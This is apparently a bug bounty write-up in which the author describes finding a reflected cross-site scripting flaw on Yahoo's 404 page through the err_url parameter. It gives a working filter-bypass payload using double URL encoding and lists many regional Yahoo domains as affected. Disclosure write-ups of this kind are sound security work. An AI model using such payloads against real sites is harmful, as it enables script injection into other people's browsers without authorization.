Hey everybody,

Today i will talk about the XSS that i found on the yahoo main domains, and really i was amazed that no one discovered this before?!! they fixed more than 1741 security bugs.

At the first i hope to inform you that this is my first challenge on bugbounty programs and i have successfully bypassed it.

let’s show what i did in this challenge (like the CTFs) 😀

This is the start point, i went to yahoo.com and trying to guess any files or directories like this yahoo.com/7amama and because 7amama wasn’t found there, i found myself on 404 page, but this page was here

yahoo.com/?err=404&err_url=https://www.yahoo.com/7amama

and i found on this url two parameters but i might test the second one because when i changed the first one i found my self be away from my place, i changed the second one and i found it was reflected on the response page… Great

By trying to change the value to be http://attacker.com and searching for this string “attacker.com” on source code, i found that this was reflected on two places, first one on the anchor tag and the second one on the javascript code. (for this code …. nice to meet you 😀 )

I Tried to test for XSS by injecting single quote to my input, and here is the reflected value on the JS code.

The server replaced my single quote to be & sign but because i love php, i guessed the senario on the backend, they was searching for single quotes but i am not sure tell now, by another check to send the url-encoding of my payload (single quotes) like this %27 and checked the source code, i found the same result. 😦

May there is no XSS, but how did they know that this value %27 is the url-encoding value of the single quote, may be they was making url-decoding on the backend server.

I left this challenge several times, and finally i decided to understand what was happening there? not important to discover a bug 🙂 .

Like CTF challenges, almost time i did’t solve challenges but l learned alot from CTFs by searching for the problems.

Again, i tried to inject with double-url-encoding to change single quote to be %25%32%37 and sent my request and the happiness is to find this result in the source code.

I thought i did it, i closed the single quote, you may ask your self a question “Why did’t i try to close the script tag and excute my code directly?” i will answer by “No way for this senario 😀 .

Now, it the time to make our payload according to this mechanism, i want to make this payload bypassing this filter http://attacker.com’-alert(1)-‘7amama let’s see what will bypassed and what is the way to bypass the filter.

http://attacker.com => will be bypassed ' => will be bypassed by using this form %25%32%37 (double-url-encoding) - => will be bypassed 7amama => will be bypassed Final Payload: http://attacker.com%25%32%37-alert(1)-%25%32%377amama

and here is the result,

The previous attack is for yahoo.com domain, and when i checked the other main domains i found all of them are vulnerable for this xss like:

hk.yahoo.com, nz.yahoo.com, au.yahoo.com, uk.yahoo.com, ca.yahoo.com, att.yahoo.com, ie.yahoo.com, frontier.yahoo.com, in.yahoo.com, tikona.yahoo.com, es.yahoo.com, ………

Now, you are going to look at my yahoo xss gallery 😀

Here is my video for POC to yahoo:

Happy Hacking …

Thank you

@dia2diab